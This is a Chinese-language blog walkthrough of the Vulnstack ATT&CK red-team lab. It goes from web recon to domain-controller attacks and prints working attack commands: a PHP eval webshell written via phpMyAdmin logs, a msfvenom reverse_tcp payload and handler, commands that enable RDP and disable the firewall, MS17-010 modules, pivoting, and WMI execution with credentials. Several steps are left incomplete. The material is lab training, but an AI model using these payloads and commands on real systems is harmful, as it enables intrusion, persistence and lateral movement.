- 1移动H3_2S光猫进入管理员账号_h3-2s超级密码
- 2【信道编码】LDPC-BP信道编码【含Matlab源码 2340期】_ldpc编码是信道编码的代码
- 3《大话数据结构》-程杰自学数据结构感悟_程杰大话数据结构
- 4刚刚,谷歌宣布TPU全面开放,AI芯片及云市场再迎变局
- 5Word Embeddings 原理与代码实战案例讲解
- 6寿星万年历---java算法实现_寿星万年历算法
- 7Java程序设计——实现求几何图形的周长面积_java用接口编写程序长方形和圆形都属子几何图形,都有周长和面积,并且它们都有
- 8如何在Spring Boot应用中加载和使用TensorFlow模型
- 9Java面试题以及答案--SpringMVC框架_java mvc面试
- 10Python 操作excel
【学习】| ATT&CK红队评估实战靶场_atk&ck靶场六
赞
踩
【学习】| ATT&CK红队评估实战靶场(一)的搭建和模拟攻击过程全过程
0x01 前言
本靶机环境是红日团队开源的一个红队实战测试环境,靶机下载地址如下:
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环。虚拟机默认密码为hongrisec@2019。
0x02 环境搭建
本次环境搭建和靶机默认有些区别,我是在一台服务器的虚拟机上搭建的,服务器资源足够,为了避免运行卡顿,攻击机Kali也是在虚拟机上,具体配置如下,Kali虚拟机、WEB服务器win7外网网卡和宿主机桥接,和办公终端都是连到同一个局域网中。
WEB服务器:windows7系统
域成员:windows server 2003系统
域控服务器:windows server 2008系统
攻击机器:kali 2020.2
宿主机IP:windows server 2008系统
安装CobaltStrike服务器
0x03 攻入内网
3.1. 信息收集
记得在做这几步之前先把phpstudy打开!!
3.1.1 主机探测
此处方法众多,选用自己熟悉的方式即可
此处我选用etteracp扫描,当然也可以尝试arpscan等等具体情况具体分析
3.1.2 端口扫描
nmap -sC -v -n -sV -Pn -p 1-65535 192.168.153.128
发现80端口开启,访问页面http://192.168.153.128/发现页面如下,存在大量信息泄露,收集有效信息。
3.1.3 目录扫描
此处方法众多,选用熟悉的方法即可例如kali自带的dirb等等
此处使用7kbscan-WebPathBrute目录扫描工具开展漏洞扫描
发现网站备份文件和phpadmin后台管理界面
打开备份文件发现网站源码,打开robots.txt发现网站CMS为yxcms,访问http://192.168.153.128/yxcms进入网站首页
3.2. 漏洞利用
3.2.1 漏洞发现
3.2.1.1 漏洞一:信息泄露+弱口令
网站泄露后台地址和用户密码,且用户密码为弱口令
成功登录网站后台界面
3.2.1.2 漏洞二:PhpMyAdmin弱口令
发现使用默认用户名/口令(root/root)成功登录PhpMyAdmin管理页面
3.2.1.3 漏洞三:yxcms留言本XSS存储型漏洞
前台提交带有XSS代码的留言
后台审核成功弹出XSS弹窗
审核通过之后,前台同样成功弹窗
可通过该漏洞获取管理员cookie或者诱导管理员点击执行某恶意代码
3.2.1.4 漏洞四:yxcms后台任意文件读写漏洞
在后台创建新模板模块创建内容为一句话的新模板
通过前面的备份文件可知文件保存的目录http://192.168.153.128/yxcms/protected/apps/default/view/default/hack.php
使用蚁剑成功连接shell
3.2.1.5 漏洞五:yxcms后台SQL注入漏洞
在后台的碎片列表中进行删除操作,删除碎片ID可能存在盲注漏洞,使用dnslog获取SQL注入得到数据。
yxcms漏洞代码原理解析参考文章https://www.freebuf.com/column/162886.html
3.2.1.6 漏洞六:PhpMyAdmin开启全局日志getshell
首先测试是否可以使用select into outfile直接写入
写入失败, show global variables like ‘%secure%’查看变量secure-file-priv 值为NULL,且为只读无法修改。
尝试使用全局日志写入shell,查看全局变量general_log:show global variables like ‘%general_%’
开启全局日志并修改日志保存位置为C:/phpStudy/WWW/hack.php
查询一句话写入日志Select ‘<?php eval($_POST[hack]);?>’
使用蚁剑连接一句话木马http://172.16.1.134/hack.php
3.3 CS上线GetShell
CS客户端服务端都部署在192.168.1.236主机上,创建监听并生成powershell
ip地址为服务器端ip
然后启动cobaltstrike.bat
创建监听并生成powershell
时间反应比较慢,建议多执行几次并等一会
提权成功
3.4 系统信息收集
查看网卡
发现内网ip地址192.168.54.10和域god.org,查看域信息
net group /domain #查看域内所有用户列表
net group “domain computers” /domain #查看域成员计算机列表
net group “domain admins” /domain #查看域管理员用户
这个地方做不了了
3.5 主机密码收集
获取系统用户名和密码
3.6 远程桌面登录
远程开启3389端口并关闭防火墙
注册表开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
关闭防火墙
netsh firewall set opmode disable #winsows server 2003 之前
netsh advfirewall set allprofiles state off #winsows server 2003 之后
https://jingyan.baidu.com/article/9f7e7ec04321f22e29155413.html
关闭防火墙
连接成功
0x04 内网信息收集
4.1 域信息收集
前面收集到的信息Win7计算机名字为STU1,另外还有两个域用户分别是DEV1、ROOT-TVI862UBEH、域控制用户为OWA
win7内网的IP地址为192.168.54.10
进一步开始收集,通过Ladon 192.168.54.0/24 OnlinePC探测域内存活主机
4.5 内网漏洞扫描
前期我们获取到win7的远程桌面也可以通过远程发现win7主机上安装了nmap工具,我们可以进一步针对192.168.52.0/24内网网段进行漏洞信息收集
跳了
0x05 横向渗透
5.1 MSF反弹shell
#生成反弹shell文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f raw > shell.php
#在本机中设置监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.101
set lport 4444
run
然后使用蚁剑上传shell.php,并访问http://ip/shell.php
5.2 内网流量转发(MSF+proxychains)
参考文章https://www.freebuf.com/articles/network/125278.html
成功获取msf反弹shell,添加路由到目标环境网络,使得msf能够通过win7路由转发访问192.168.54.0/24网段
#查看路由信息
run get_local_subnets
#添加一条路由
run autoroute -s 192.168.54.0/24
使用msf的socks4代理模块
这里非常重要,启动代理后别关!
文本编辑器修改etc/proxychains.conf,在最后一行加上socks4代理服务器
使用proxychains代理nmap扫描主机
5.3 MS08-067 搭配Bind TCP
由于没有定义双向路由,目标系统无法直接连接到攻击机,所以我们需要将Bind_tcp设置为payload类型,在exploit操作成功之后,就要对连接到目标系统的端口进行监听,两者区别如下:
完整设置如下:
???运行不出来
5.4 MS17-010获取域控服务器
我们同样可以使用MS17-010获取域服务器和域控服务器权限,这里我们直接攻击域控服务器
使用exploit/windows/smb/ms17_010_eternalblue攻击流程如下:
获取失败,使用
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/blind_tcp
攻击流程如下
仍然无法有效获取会话
5.5 WMI获取域控服务器
上传vmiexec.vbs到192.168.54.128(win7)机器上,然后执行
cscript.exe vmiexec.vbs /cmd 192.168.54.130 administrator hongrisec@2021 “whoami”
或者直接使用之前上传的Ladom工具执行ladom wmiexec 192.168.54.130 administrator hongrisec@2021 whoami
5.6 票据加计划任务获取DC
0x06 后记
0x07 参考
https://www.cnblogs.com/liliyuanshangcao/p/13743389.html#_label2_1
https://blog.csdn.net/u014029795/article/details/117375754?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522162273675316780265410889%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=162273675316780265410889&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allfirst_rank_v2~rank_v29-2-117375754.pc_search_result_control_group&utm_term=msf6%E6%80%8E%E4%B9%88%E5%81%9A%E5%86%85%E7%BD%91%E8%BD%AC%E5%8F%91&spm=1018.2226.3001.4187
